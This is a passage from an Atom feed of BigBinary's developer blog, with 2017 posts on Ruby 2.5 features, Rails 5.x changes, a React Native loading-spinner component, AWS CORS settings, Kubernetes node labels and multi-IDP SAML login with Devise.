method was born.</p><h4>Ruby 2.5.0-preview1</h4><pre><code class="language-ruby">irb&gt; &quot;Projects::CategoriesController&quot;.delete_prefix(&quot;Projects::&quot;)=&gt; &quot;CategoriesController&quot;</code></pre><p>Now in order to delete prefix we can use <code>delete_prefix</code> and to delete suffix wecould use <code>chomp</code>. This did not feel right. So for symmetry <code>delete_suffix</code> wasadded.</p><pre><code class="language-ruby">irb&gt; &quot;Projects::CategoriesController&quot;.delete_suffix(&quot;Controller&quot;)=&gt; &quot;Projects::Categories&quot;</code></pre><p>Read up on <a href="https://bugs.ruby-lang.org/issues/12694">this discussion</a> to learnmore about how elixir, go, python, and PHP deal with similar requirements.</p>]]></content>
    </entry><entry>
       <title><![CDATA[Ruby 2.5 introduces Dir.children and Dir.each_child]]></title>
       <author><name>Mohit Natoo</name></author>
      <link href="https://www.bigbinary.com/blog/ruby-2_5-introduces-dir-children-and-dir-each_child"/>
      <updated>2017-11-21T12:00:00+00:00</updated>
      <id>https://www.bigbinary.com/blog/ruby-2_5-introduces-dir-children-and-dir-each_child</id>
      <content type="html"><![CDATA[<p><a href="https://ruby-doc.org/core-2.4.2/Dir.html#entries-method">Dir.entries</a> is amethod present in Ruby 2.4. It returns the output of shell command <code>ls -a</code> in anarray.</p><pre><code class="language-ruby">&gt; Dir.entries(&quot;/Users/john/Desktop/test&quot;)&gt; =&gt; [&quot;.&quot;, &quot;..&quot;, &quot;.config&quot;, &quot;program.rb&quot;, &quot;group.txt&quot;]&gt;</code></pre><p>We also have method<a href="https://ruby-doc.org/core-2.4.2/Dir.html#foreach-method">Dir.foreach</a> whichiterates and yields each value from the output of <code>ls -a</code> command to the block.</p><pre><code class="language-ruby">&gt; Dir.foreach(&quot;/Users/john/Desktop/test&quot;) { |child| puts child }&gt; .&gt; ..&gt; .config&gt; program.rb&gt; group.txt&gt; test2&gt;</code></pre><p>We can see that the output includes the directives for current directory andparent directory which are <code>&quot;.&quot;</code> and <code>&quot;..&quot;</code>.</p><p>When we want to have access only to the children files and directories, we donot need the <code>[&quot;.&quot;, &quot;..&quot;]</code> subarray.</p><p>This is a very common use case and we'll probably have to do something like<code>Dir.entries(path) - [&quot;.&quot;, &quot;..&quot;]</code> to achieve the desired output.</p><p>To overcome such issues,<a href="https://bugs.ruby-lang.org/issues/11302">Ruby 2.5 introduced Dir.children</a>. Itreturns the output of <code>ls -a</code> command without the directives for current andparent directories.</p><pre><code class="language-ruby">&gt; Dir.children(&quot;/Users/mohitnatoo/Desktop/test&quot;)&gt; =&gt; [&quot;.config&quot;, &quot;program.rb&quot;, &quot;group.txt&quot;]&gt;</code></pre><p>Additionally, we can use <code>Dir.each_child</code> method to avoid yielding current andparent directory directives while iterating,</p><pre><code class="language-ruby">&gt; Dir.each_child(&quot;/Users/mohitnatoo/Desktop/test&quot;) { |child| puts child }&gt; .config&gt; program.rb&gt; group.txt&gt; test2&gt;</code></pre><p>As noted in the <a href="https://bugs.ruby-lang.org/issues/11302">discussion</a> the nameswere chosen to match with existing methods<a href="https://ruby-doc.org/stdlib-2.4.2/libdoc/pathname/rdoc/Pathname.html#method-i-children">Pathname#children</a>and<a href="https://ruby-doc.org/core-2.4.2/Dir.html#foreach-method">Pathname#each_child</a>.</p><p>These additions seem like simple features. Well the issue was posted more thantwo years ago.</p>]]></content>
    </entry><entry>
       <title><![CDATA[Higher Order Component to render spinner React Native]]></title>
       <author><name>Chirag Shah</name></author>
      <link href="https://www.bigbinary.com/blog/higher-order-component-for-rendering-spinner-in-react-native-app"/>
      <updated>2017-11-15T12:00:00+00:00</updated>
      <id>https://www.bigbinary.com/blog/higher-order-component-for-rendering-spinner-in-react-native-app</id>
      <content type="html"><![CDATA[<p>In one of our<a href="https://bigbinary.com/blog/using-recompose-to-build-higher-order-components">previous blogs</a>,we mentioned how<a href="https://github.com/acdlite/recompose">recompose</a>improves boththe readabilityand themaintainabilityof the code.</p><p>We also sawhow <a href="https://github.com/acdlite/recompose/blob/master/docs/API.md#branch">branch</a>and<a href="https://github.com/acdlite/recompose/blob/master/docs/API.md#rendercomponent">renderComponent</a>functionsfrom <code>recompose</code>help usin decidingwhich component to renderbased on a condition.</p><p>We can use the code from<a href="https://github.com/acdlite/recompose/blob/master/docs/API.md#rendercomponent">renderComponent documentation</a>to render aspinner component whenthe data is being fetchedin a ReactJS application.</p><h2>Initial Code</h2><pre><code class="language-javascript">// PatientsList.jsimport React, { Component } from 'react';import LoadingIndicator from './LoadingIndicator';export default class PatientsList extends Component {  state = {    isLoading: true,    patientsList: [],  }  componentDidMount() {    api.getPatientsList().then(responseData =&gt; {      this.setState({        patientsList: responseData,        isLoading: false,      })    })  }  render() {    const { isLoading } = this.state;    if (isLoading) {      return &lt;LoadingIndicator isLoading={isLoading} /&gt;    } else {      return (        &lt;ScrollView&gt;          // Some header component          // View rendering the patients        &lt;/ScrollView&gt;      )    }  }</code></pre><p>In the above code,when the PatientsList component mounts,it fetchesthe list of patients from the API.During this time,the <code>isLoading</code> state is <code>true</code>,so we renderthe <code>LoadingIndicator</code> component.</p><p>Once the API callreturns with the response,we setthe <code>isLoading</code> state to <code>false</code>.This renders<code>ScrollView</code> component,with our list of patients.</p><p>The above code works fine,butif our app has multiple screens,which showthe loading indicatorand fetch data,the above wayof handling itbecomes repetitiveand hard to maintain.</p><h2>Building a higher order component</h2><p>Here's whereHigher Order Components(HOC)are very useful.We can extract the logicfor the abilityto show the loading indicatorin a HOC.</p><pre><code class="language-javascript">// withSpinner.jsimport React from &quot;react&quot;;import { ScrollView } from &quot;react-native&quot;;import LoadingIndicator from &quot;./LoadingIndicator&quot;;const withSpinner = (Comp) =&gt; ({ isLoading, children, ...props }) =&gt; {  if (isLoading) {    return &lt;LoadingIndicator isLoading={isLoading} /&gt;;  } else {    return &lt;Comp {...props}&gt;{children}&lt;/Comp&gt;;  }};export default withSpinner;</code></pre><p>Here,we created a HOC componentwhich accepts a componentand the <code>isLoading</code> prop.</p><p>If <code>isLoading</code> is true,we show the <code>LoadingIndicator</code>.If <code>isLoading</code> is false,we show the supplied componentwith its children,and pass in the props.</p><p>Now,we can use the above HOCin our PatientsList.js file.The supplied componentcan be any React Native componentbased on the use case.Here in our case,its a ScrollView.</p><pre><code class="language-javascript">// PatientsList.jsimport { ScrollView } from 'react-native';import withSpinner from './withSpinner';const ScrollViewWithSpinner = withSpinner(ScrollView);export default class PatientsList extends Component {  state = {    isLoading: true,    patientsList: [],  }  componentDidMount() {    api.getPatientsList().then(responseData =&gt; {      this.setState({        patientsList: responseData,        isLoading: false,      })    })  }  render() {    const { isLoading } = this.state;    return(      &lt;ScrollViewWithSpinner        isLoading={isLoading}        // other props      &gt;        // Some header component        // View rendering the patients      &lt;/ScrollViewWithSpinner&gt;    )  }</code></pre><h2>Conclusion</h2><p>Because of the aboveextraction of logic to a HOC,we can now use the same HOCin all our componentswhich render a loading indicatorwhile the data is being fetched.</p><p>The logicto show a loading indicatornow resides in a HOC.This makes the code easierto maintain and less repetitive.</p>]]></content>
    </entry><entry>
       <title><![CDATA[Rails 5.1 doesn't load all records on calling Model.all#inspect]]></title>
       <author><name>Mohit Natoo</name></author>
      <link href="https://www.bigbinary.com/blog/do-no-load-all-records-on-activerecord-relation-inspect"/>
      <updated>2017-11-14T12:00:00+00:00</updated>
      <id>https://www.bigbinary.com/blog/do-no-load-all-records-on-activerecord-relation-inspect</id>
      <content type="html"><![CDATA[<p>Let's take a project with hundreds of users. When we call inspect on <code>User.all</code>,we see an array of 10 users followed by <code>...</code>. That means the output of<code>#inspect</code> method shows data only for 10 records.</p><pre><code class="language-ruby">&gt; User.all.inspectUser Load (3.7ms)  SELECT  &quot;users&quot;.* FROM &quot;users&quot;=&gt; &quot;#&lt;ActiveRecord::Relation [#&lt;User id: 1, email: \&quot;dirbee@example.com\&quot; &gt;,#&lt;User id: 2, email: \&quot;tee@example.com\&quot;&gt;,#&lt;User id: 3, email: \&quot;scott@example.com\&quot;&gt;,#&lt;User id: 4, email: \&quot;mark@example.com\&quot;&gt;,#&lt;User id: 5, email: \&quot;ben@example.com\&quot;&gt;,#&lt;User id: 6, email: \&quot;tina@example.com\&quot;&gt;,#&lt;User id: 7, email: \&quot;tyler@example.com\&quot;&gt;,#&lt;User id: 8, email: \&quot;peter@example.com\&quot;&gt;,#&lt;User id: 9, email: \&quot;rutul@example.com\&quot;&gt;,#&lt;User id: 10, email:\&quot;michael@example.com\&quot;&gt;,...]&gt;&quot;</code></pre><p>We can see that the query executed in the process is fetching all the recordseven though the output doesn't need all of them.</p><p>In Rails 5.1,<a href="https://github.com/rails/rails/pull/28592">only the needed records are loaded</a>when <code>inspect</code> is called on ActiveRecord::Relation.</p><pre><code class="language-ruby">&gt; User.all.inspectUser Load (3.7ms)  SELECT  &quot;users&quot;.* FROM &quot;users&quot; LIMIT $1 /*application:Ace Invoice*/  [[&quot;LIMIT&quot;, 11]]=&gt; &quot;#&lt;ActiveRecord::Relation [#&lt;User id: 1, email: \&quot;dirbee@example.com\&quot; &gt;,#&lt;User id: 2, email: \&quot;tee@example.com\&quot;&gt;,#&lt;User id: 3, email: \&quot;scott@example.com\&quot;&gt;,#&lt;User id: 4, email: \&quot;mark@example.com\&quot;&gt;,#&lt;User id: 5, email: \&quot;ben@example.com\&quot;&gt;,#&lt;User id: 6, email: \&quot;tina@example.com\&quot;&gt;,#&lt;User id: 7, email: \&quot;tyler@example.com\&quot;&gt;,#&lt;User id: 8, email: \&quot;peter@example.com\&quot;&gt;,#&lt;User id: 9, email: \&quot;rutul@example.com\&quot;&gt;,#&lt;User id: 10, email:\&quot;michael@example.com\&quot;&gt;,...]&gt;&quot;</code></pre><p>We can see in the above case that query executed has limit constraint and henceonly the required number of records are loaded.</p>]]></content>
    </entry><entry>
       <title><![CDATA[Fixing CORS issue with AWS services]]></title>
       <author><name>Narendra Rajput</name></author>
      <link href="https://www.bigbinary.com/blog/fixing-cors-issue-with-aws-services"/>
      <updated>2017-10-31T12:00:00+00:00</updated>
      <id>https://www.bigbinary.com/blog/fixing-cors-issue-with-aws-services</id>
      <content type="html"><![CDATA[<p>While working on a client project, we started facing an issue where the JWPlayerstopped playing videos when we switched to<a href="https://en.wikipedia.org/wiki/HTTP_Live_Streaming">hls</a> version of videos. Wefound a<a href="https://developer.mozilla.org/en-US/docs/Web/HTTP/Access_control_CORS">CORS</a>error in the JS console as shown below.</p><p><img src="/blog_images/2017/fixing-cors-issue-with-aws-services/cors_error.png" alt="cors error"></p><p>After researching we found that JWPlayer makes an AJAX request to load the<a href="https://en.wikipedia.org/wiki/M3U#M3U8">m3u8</a> file. To fix the issue, we neededto enable CORS and for that we needed to make changes to S3 and Cloudfrontconfigurations.</p><h2>S3 configuration changes</h2><p>We can configure CORS for the S3 bucket by allowing requests originating fromspecified hosts. As show in the image below we can find the CORS configurationoption in Permissions tab of the S3 bucket.<a href="http://docs.aws.amazon.com/AmazonS3/latest/dev/cors.html">Here</a> is the officialdocumentation on configuring CORS for S3.</p><p><img src="/blog_images/2017/fixing-cors-issue-with-aws-services/s3_cors_configuration.png" alt="s3 cors configuration"></p><p>S3 bucket will now allow requests originating from the specified hosts.</p><h2>Cloudfront configuration changes</h2><p><a href="http://docs.aws.amazon.com/AmazonCloudFront/latest/DeveloperGuide/Introduction.html">Cloudfront</a>is a CDN service provided by AWS which uses edge locations to speed up thedelivery of static content. Cloudfront takes content from S3 buckets and cachesit at edge locations and delivers it to the end user. For enabling CORS we needto configure Cloudfront to allow forwarding of required headers.</p><p>We can configure the behavior of Cloudfront by clicking on CloudfrontDistribution's &quot;Distribution Settings&quot;. Then from the &quot;Behaviour&quot; tab click on&quot;Edit&quot;. Here we need to whitelist the headers that need to be forwarded. Selectthe &quot;Origin&quot; header to whitelist which is required for CORS, as shown in theimage below.</p><p><img src="/blog_images/2017/fixing-cors-issue-with-aws-services/cloudfront_behaviour.png" alt="cloudfront behaviour"></p>]]></content>
    </entry><entry>
       <title><![CDATA[Ruby 2.5 allows rescue/else/ensure inside do/end blocks]]></title>
       <author><name>Amit Choudhary</name></author>
      <link href="https://www.bigbinary.com/blog/ruby-2.5-allows-rescue-inside-do-end-blocks"/>
      <updated>2017-10-24T12:00:00+00:00</updated>
      <id>https://www.bigbinary.com/blog/ruby-2.5-allows-rescue-inside-do-end-blocks</id>
      <content type="html"><![CDATA[<h4>Ruby 2.4</h4><pre><code class="language-ruby">irb&gt; array_from_user = [4, 2, 0, 1]  =&gt; [4, 2, 0, 1]irb&gt; array_from_user.each do |number|irb&gt;   p 10 / numberirb&gt; rescue ZeroDivisionError =&gt; exceptionirb&gt;   p exceptionirb&gt;   nextirb&gt; endSyntaxError: (irb):4: syntax error, unexpected keyword_rescue,expecting keyword_endrescue ZeroDivisionError =&gt; exception      ^</code></pre><p>Ruby 2.4 throws an error when we try to use rescue/else/ensure inside do/endblocks.</p><h4>Ruby 2.5.0-preview1</h4><pre><code class="language-ruby">irb&gt; array_from_user = [4, 2, 0, 1]  =&gt; [4, 2, 0, 1]irb&gt; array_from_user.each do |number|irb&gt;   p 10 / numberirb&gt; rescue ZeroDivisionError =&gt; exceptionirb&gt;   p exceptionirb&gt;   nextirb&gt; end25#&lt;ZeroDivisionError: divided by 0&gt;10 =&gt; [4, 2, 0, 1]</code></pre><p>Ruby 2.5 supports rescue/else/ensure inside do/end blocks.</p><p>Here is relevant <a href="https://github.com/ruby/ruby/commit/0ec889d7ed">commit</a> and<a href="https://bugs.ruby-lang.org/issues/12906">discussion</a>.</p>]]></content>
    </entry><entry>
       <title><![CDATA[Rails adds accurate numerical validation]]></title>
       <author><name>Sushant Mittal</name></author>
      <link href="https://www.bigbinary.com/blog/rails-now-avoids-converting-integer-as-a-string-into-float-when-validating-numericality"/>
      <updated>2017-10-23T12:00:00+00:00</updated>
      <id>https://www.bigbinary.com/blog/rails-now-avoids-converting-integer-as-a-string-into-float-when-validating-numericality</id>
      <content type="html"><![CDATA[<p>Let's see an example of numerical validation of very large numbers.</p><pre><code class="language-ruby">class Score  validates :total, numericality: { less_than_or_equal_to: 10_000_000_000_000_000 }end&gt; score = Score.new(total: (10_000_000_000_000_000 + 1).to_s)&gt; score.total#=&gt; 1.0e+16&gt; score.invalid?#=&gt; false</code></pre><p>Here, we have added numerical validation on <code>total</code> column of <code>Score</code> model that it should be less than <code>10_000_000_000_000_000</code>.</p><p>After that we have created one instance of this model with <code>total</code> greater than allowed value.This should result in an invalid object as it violates the numericality criteria.</p><p>But it is still valid. We can also see that value of <code>total</code> has been converted into floating numberinstead of integer. This happens because Rails used to <a href="https://github.com/rails/rails/blob/46bf9eea533f8a2fedbb0aaad12cae1c5a4b9612/activemodel/lib/active_model/validations/numericality.rb#L73">convert the input to float</a> <a href="https://github.com/rails/rails/blob/46bf9eea533f8a2fedbb0aaad12cae1c5a4b9612/activemodel/lib/active_model/validations/numericality.rb#L39">if it was not</a>already numeric.</p><p>The real problem is here is that the floating point comparison of the Ruby language itself which is not accurate for very large numbers.</p><pre><code class="language-ruby">&gt;&gt; a = (10_000_000_000_000_000 + 1).to_s=&gt; &quot;10000000000000001&quot;&gt;&gt; b = Kernel.Float a=&gt; 1.0e+16&gt;&gt; c = b + 1=&gt; 1.0e+16&gt;&gt; c &lt; b=&gt; false&gt;&gt; c &gt; b=&gt; false&gt;&gt;</code></pre><p>This issue has been fixed in Rails <a href="https://github.com/rails/rails/commit/b0be7792adf58e092b7f615ecbf3339ea70ee689">here</a>. Now, if the given string input can be treated as integer, then <a href="https://github.com/rails/rails/blob/1ceaf7db5013a233bdc671b3f46583c4c1189fe1/activemodel/lib/active_model/validations/numericality.rb#L88">an integer value is returned instead of float</a>. This makes sure that the comparison works correctly.</p><pre><code class="language-ruby"># Rails 5.2&gt; score = Score.new(total: (10_000_000_000_000_000 + 1).to_s)&gt; score.total#=&gt; 10000000000000001&gt; score.invalid?#=&gt; true</code></pre><p>This change is present in Rails 5.2 and above. It also backported to Rails 5.1 and Rails 5.0 branches.</p>]]></content>
    </entry><entry>
       <title><![CDATA[Ruby 2.5 has removed top level constant lookup]]></title>
       <author><name>Amit Choudhary</name></author>
      <link href="https://www.bigbinary.com/blog/ruby-2.5-has-removed-top-level-constant-lookup"/>
      <updated>2017-10-18T12:00:00+00:00</updated>
      <id>https://www.bigbinary.com/blog/ruby-2.5-has-removed-top-level-constant-lookup</id>
      <content type="html"><![CDATA[<h4>Ruby 2.4</h4><pre><code class="language-ruby">irb&gt; class Projectirb&gt; end=&gt; nilirb&gt; class Categoryirb&gt; end=&gt; nilirb&gt; Project::Category(irb):5: warning: toplevel constant Category referenced by Project::Category =&gt; Category</code></pre><p>Ruby 2.4 returns the top level constant with a warning if it is unable to find aconstant in the specified scope.</p><p>This does not work well in cases where we need constants to be defined with samename at top level and also in the same scope.</p><h4>Ruby 2.5.0-preview1</h4><pre><code class="language-ruby">irb&gt; class Projectirb&gt; end=&gt; nilirb&gt; class Categoryirb&gt; end=&gt; nilirb&gt; Project::CategoryNameError: uninitialized constant Project::CategoryDid you mean?  Categoryfrom (irb):5</code></pre><p>Ruby 2.5 throws an error if it is unable to find a constant in the specifiedscope.</p><p>Here is the relevant <a href="https://github.com/ruby/ruby/commit/44a2576f79">commit</a>and <a href="https://bugs.ruby-lang.org/issues/11547">discussion</a>.</p>]]></content>
    </entry><entry>
       <title><![CDATA[Scheduling pods on nodes in Kubernetes using labels]]></title>
       <author><name>Rahul Mahale</name></author>
      <link href="https://www.bigbinary.com/blog/scheduling-pods-on-nodes-in-kubernetes-using-labels"/>
      <updated>2017-10-16T12:00:00+00:00</updated>
      <id>https://www.bigbinary.com/blog/scheduling-pods-on-nodes-in-kubernetes-using-labels</id>
      <content type="html"><![CDATA[<p>This post assumes that you have basic understanding of<a href="http://kubernetes.io/">Kubernetes</a> terms like<a href="http://kubernetes.io/docs/user-guide/pods/">pods</a>,<a href="http://kubernetes.io/docs/user-guide/deployments/">deployments</a> and<a href="https://kubernetes.io/docs/concepts/architecture/nodes/">nodes</a>.</p><p>A Kubernetes cluster can have many nodes. Each node in turn can run multiplepods. By default Kubernetes manages which pod will run on which node and this issomething we do not need to worry about it.</p><p>However sometimes we want to ensure that certain pods do not run on the samenode. For example we have an application called <em>wheel</em>. We have both stagingand production version of this app and we want to ensure that production pod andstaging pod are not on the same host.</p><p>To ensure that certain pods do not run on the same host we can use<strong>nodeSelector</strong> constraint in <strong>PodSpec</strong> to schedule pods on nodes.</p><h3>Kubernetes cluster</h3><p>We will use <a href="https://github.com/kubernetes/kops/">kops</a> to provision cluster. Wecan check the health of cluster using <code>kops validate-cluster</code>.</p><pre><code class="language-bash">$ kops validate clusterUsing cluster from kubectl context: test-k8s.nodes-staging.comValidating cluster test-k8s.nodes-staging.comINSTANCE GROUPSNAME              ROLE   MACHINETYPE MIN MAX SUBNETSmaster-us-east-1a Master m4.large    1   1 us-east-1amaster-us-east-1b Master m4.large    1   1 us-east-1bmaster-us-east-1c Master m4.large    1   1 us-east-1cnodes-wheel-stg   Node   m4.large    2   5 us-east-1a,us-east-1bnodes-wheel-prd   Node   m4.large    2   5 us-east-1a,us-east-1bNODE STATUS           NAME                ROLE   READYip-192-10-110-59.ec2.internal  master Trueip-192-10-120-103.ec2.internal node   Trueip-192-10-42-9.ec2.internal    master Trueip-192-10-73-191.ec2.internal  master Trueip-192-10-82-66.ec2.internal   node   Trueip-192-10-72-68.ec2.internal   node   Trueip-192-10-182-70.ec2.internal  node   TrueYour cluster test-k8s.nodes-staging.com is ready</code></pre><p>Here we can see that there are two instance groups for nodes: <em>nodes-wheel-stg</em>and <em>nodes-wheel-prd</em>.</p><p><em>nodes-wheel-stg</em> might have application pods like <em>pod-wheel-stg-sidekiq</em>,<em>pod-wheel-stg-unicorn</em> and <em>pod-wheel-stg-redis</em>. Similarly <em>nodes-wheel-prd</em>might have application pods like <em>pod-wheel-prd-sidekiq</em>,<em>pod-wheel-prd-unicorn</em> and <em>pod-wheel-prd-redis</em>.</p><p>As we can see the <strong>Max number of nodes</strong> for instance group <em>nodes-wheel-stg</em>and <em>nodes-wheel-prd</em> is 5. It means if new nodes are created in future thenbased on the instance group the newly created nodes will automatically belabelled and no manual work is required.</p><h3>Labelling a Node</h3><p>We will use<a href="https://kubernetes.io/docs/concepts/overview/working-with-objects/labels/">kubernetes labels</a>to label a node. To add a label we need to edit instance group using kops.</p><pre><code class="language-bash">$ kops edit ig nodes-wheel-stg</code></pre><p>This will open up instance group configuration file, we will add following labelin instance group spec.</p><pre><code class="language-yaml">nodeLabels:  type: wheel-stg</code></pre><p>Complete <code>ig</code> configuration looks like this.</p><pre><code class="language-yaml">apiVersion: kops/v1alpha2kind: InstanceGroupmetadata:  creationTimestamp: 2017-10-12T06:24:53Z  labels:    kops.k8s.io/cluster: k8s.nodes-staging.com  name: nodes-wheel-stgspec:  image: kope.io/k8s-1.7-debian-jessie-amd64-hvm-ebs-2017-07-28  machineType: m4.large  maxSize: 5  minSize: 2  nodeLabels:    type: wheel-stg  role: Node  subnets:    - us-east-1a    - us-east-1b    - us-east-1c</code></pre><p>Similarly, we can label for instance group <em>nodes-wheel-prod</em> with label <em>typewheel-prod</em>.</p><p>After making the changes update cluster using<code>kops rolling update cluster --yes --force</code>. This will update the cluster withspecified labels.</p><p>New nodes added in future will have labels based on respective<code>instance groups</code>.</p><p>Once nodes are labeled we can verify using <code>kubectl describe node</code>.</p><pre><code class="language-bash">$ kubectl describe node ip-192-10-82-66.ec2.internalName:               ip-192-10-82-66.ec2.internalRoles:              nodeLabels:             beta.kubernetes.io/arch=amd64                    beta.kubernetes.io/instance-type=m4.large                    beta.kubernetes.io/os=linux                    failure-domain.beta.kubernetes.io/region=us-east-1                    failure-domain.beta.kubernetes.io/zone=us-east-1a                    kubernetes.io/hostname=ip-192-10-82-66.ec2.internal                    kubernetes.io/role=node                    type=wheel-stg</code></pre><p>In this way we have our node labeled using kops.</p><h3>Labelling nodes using kubectl</h3><p>We can also label node using <code>kubectl</code>.</p><pre><code class="language-bash">$ kubectl label node ip-192-20-44-136.ec2.internal type=wheel-stg</code></pre><p>After labeling a node, we will add <code>nodeSelector</code> field to our <code>PodSpec</code> indeployment template.</p><p>We will add the following block in deployment manifest.</p><pre><code class="language-yaml">nodeSelector:  type: wheel-stg</code></pre><p>We can add this configuration in original deployment manifest.</p><pre><code class="language-yaml">apiVersion: v1kind: Deploymentmetadata:  name: test-staging-node  labels:    app: test-staging  namespace: testspec:  replicas: 1  template:    metadata:      labels:        app: test-staging    spec:      containers:      - image: &lt;your-repo&gt;/&lt;your-image-name&gt;:latest        name: test-staging        imagePullPolicy: Always        - name: REDIS_HOST          value: test-staging-redis        - name: APP_ENV          value: staging        - name: CLIENT          value: test        ports:        - containerPort: 80      nodeSelector:        type: wheel-stg      imagePullSecrets:        - name: registrykey</code></pre><p>Let's launch this deployment and check where the pod is scheduled.</p><pre><code class="language-bash">$ kubectl apply -f test-deployment.ymldeployment &quot;test-staging-node&quot; created</code></pre><p>We can verify that our pod is running on node <code>type=wheel-stg</code>.</p><pre><code class="language-bash">kubectl describe pod test-staging-2751555626-9sd4mName:           test-staging-2751555626-9sd4mNamespace:      defaultNode:           ip-192-10-82-66.ec2.internal/192.10.82.66......Conditions:  Type           Status  Initialized    True  Ready          True  PodScheduled   TrueQoS Class:       BurstableNode-Selectors:  type=wheel-stgTolerations:     node.alpha.kubernetes.io/notReady:NoExecute for 300s                 node.alpha.kubernetes.io/unreachable:NoExecute for 300sEvents:          &lt;none&gt;</code></pre><p>Similarly we run <em>nodes-wheel-prod</em> pods on nodes labeled with<code>type: wheel-prod</code>.</p><p>Please note that when we specify <code>nodeSelector</code> and no node matches label thenpods are in <code>pending</code> state as they don't find node with matching label.</p><p>In this way we schedule our pods to run on specific nodes for certain use-cases.</p>]]></content>
    </entry><entry>
       <title><![CDATA[Integrate SAML with many IDPs with Devise & OmniAuth]]></title>
       <author><name>Vijay Kumar Agrawal</name></author>
      <link href="https://www.bigbinary.com/blog/saml-integration-with-multiple-idps-using-devise-omniauth"/>
      <updated>2017-10-11T12:00:00+00:00</updated>
      <id>https://www.bigbinary.com/blog/saml-integration-with-multiple-idps-using-devise-omniauth</id>
      <content type="html"><![CDATA[<p>Recently, we integrated our SAML service provider(SP)with multiple identity providers(IDPs)to facilitate Single sign-on(SSO)using Devise with OmniAuth.</p><p>Before we jump into the specifics, here isSAML definition from <a href="https://en.wikipedia.org/wiki/Security_Assertion_Markup_Language">wikipedia</a>.</p><blockquote><p>Security Assertion Markup Language (SAML, pronounced sam-el)is an open standardfor exchanging authentication and authorization databetween parties, in particular,between an identity provider(IDP) and a service provider(SP).</p></blockquote><p>The choice of <a href="https://github.com/plataformatec/devise">Devise</a> with <a href="https://github.com/omniauth/omniauth-saml">OmniAuth-SAML</a>to build SAML SSO capabilitieswas natural to us,as we already had dependency on Deviseand OmniAuth nicely integrates with Devise.</p><p><a href="https://github.com/plataformatec/devise/wiki/OmniAuth:-Overview">Here</a> is the official overviewon how to integrate OmniAuth with Devise.</p><p>After following the overview,this is how our <code>config</code> and <code>user.rb</code> looked like.</p><pre><code class="language-ruby"># config fileDevise.setup do |config|  config.omniauth :saml,    idp_cert_fingerprint: 'fingerprint',    idp_sso_target_url: 'target_url'end#user.rb filedevise :omniauthable, :omniauth_providers =&gt; [:saml]</code></pre><p>The problem with above configuration isthat it supports only one SAML IDP.</p><p>To have support for multiple IDPs,we re-defined files as below.</p><pre><code class="language-ruby"># config fileDevise.setup do |config|  config.omniauth :saml_idp1,    idp_cert_fingerprint: 'fingerprint-1',    idp_sso_target_url: 'target_url-1'    strategy_class: ::OmniAuth::Strategies::SAML,    name: :saml_idp1  config.omniauth :saml_idp2,    idp_cert_fingerprint: 'fingerprint-2',    idp_sso_target_url: 'target_url-2'    strategy_class: ::OmniAuth::Strategies::SAML,    name: :saml_idp2end#user.rb filedevise :omniauthable, :omniauth_providers =&gt; [:saml_idp1, :saml_idp2]</code></pre><p>Let's go through the changes one by one.</p><p><strong>1. Custom Providers:</strong>Instead of using standard provider <code>saml</code>,we configured custom providers (<code>saml_idp1</code>, <code>saml_idp2</code>)in the first line of configurationas well as in <code>user.rb</code></p><p><strong>2. Strategy Class:</strong>In case of the standard provider(<code>saml</code>),Devise can figure out <code>strategy_class</code>on its own.For custom providers,we need to explicitly specify it.</p><p><strong>3. OmniAuth Unique Identifier:</strong>After making the above two changes,everything worked fineexcept OmniAuth URLs.For some reason, OmniAuth was still listeningto <code>saml</code> scoped pathinstead of new provider names <code>saml_idp1, saml_idp2</code>.</p><pre><code class="language-ruby"># Actual metadata path used by OmniAuth/users/auth/saml/metadata# Expected metadata path/users/auth/saml_idp1/metadata/users/auth/saml_idp2/metadata</code></pre><p>After digging in <code>Devise</code> and <code>OmniAuth</code> code bases,we <a href="https://github.com/omniauth/omniauth/blob/6cce8181b45da49cecb9c0af139cfc62b3b1a25e/lib/omniauth/strategy.rb#L139">discovered</a> provider <code>name</code> configuration.In the absence of this configuration,OmniAuth falls back to strategy class nameto build the path.As we could not find any code in Devisewhich defined <code>name</code> for <code>OmniAuth</code>that explained <code>saml</code> scoped path(we were expecting Devise to pass <code>name</code>assigning same value as <code>provider</code>).</p><p>After adding <code>name</code> configuration,OmnitAuth started listening to the correct URLs.</p><p><strong>4. Callback Actions:</strong>Lastly, we added both actions in <code>OmniauthCallbacksController</code>:</p><pre><code class="language-ruby">class Users::OmniauthCallbacksController &lt; Devise::OmniauthCallbacksController  def saml_idp1    # Implementation  end  def saml_idp2    # Implementation  end  # ...  # Rest of the actionsend</code></pre><p>With these changes along withthe official guide mentioned above,our SP was able to authenticate users from multiple IDPs.</p>]]></content>
    </entry><entry>
       <title><![CDATA[Rails 5.2 expiry option for signed & encrypted cookies]]></title>
       <author><name>Mohit Natoo</name></author>
      <link href="https://www.bigbinary.com/blog/expirty-option-for-signed-and-encrypted-cookies-in-Rails-5-2"/>
      <updated>2017-10-09T12:00:00+00:00</updated>
      <id>https://www.bigbinary.com/blog/expirty-option-for-signed-and-encrypted-cookies-in-Rails-5-2</id>
      <content type="html"><![CDATA[<p>In Rails 5.1 we have option to set expiry for cookies.</p><pre><code class="language-ruby">cookies[:username] = {value: &quot;sam_smith&quot;, expires: Time.now + 4.hours}</code></pre><p>The above code sets cookie which expires in 4 hours.</p><p>The <code>expires</code> option, is not supported for<a href="https://blog.bigbinary.com/2013/03/19/cookies-on-rails.html">signed and encrypted cookies</a>.In other words we are not able to decide on server side when an encrypted orsigned cookie would expire.</p><p>From Rails 5.2, we'll be able to<a href="https://github.com/rails/rails/pull/30121">set expiry for encrypted and signed cookies</a>as well.</p><pre><code class="language-ruby">cookies.encrypted[:firstname] = { value: &quot;Sam&quot;, expires: Time.now + 1.day }# sets string `Sam` in an encrypted `firstname` cookie for 1 day.cookies.signed[:lastname] = {value: &quot;Smith&quot;, expires: Time.now + 1.hour }# sets string `Smith` in a signed `lastname` cookie for 1 hour.</code></pre><p>Apart from this, in Rails 5.1, we needed to provide an absolute date/time valuefor expires option.</p><pre><code class="language-ruby"># setting cookie for 90 minutes from current time.cookies[:username] = {value: &quot;Sam&quot;, expires: Time.now + 90.minutes}</code></pre><p>Starting Rails 5.2, we'll be able to set the <code>expires</code> option by giving arelative duration as value.</p><pre><code class="language-ruby"># setting cookie for 90 minutes from current time.cookies[:username] = { value: &quot;Sam&quot;, expires: 90.minutes }# After 1 hour&gt; cookies[:username]&gt; #=&gt; &quot;Sam&quot;# After 2 hours&gt; cookies[:username]&gt; #=&gt; nil&gt; ~~~</code></pre>]]></content>
    </entry><entry>
       <title><![CDATA[Optimize JavaScript code for composability with Ramda.js]]></title>
       <author><name>Neeraj Singh</name></author>
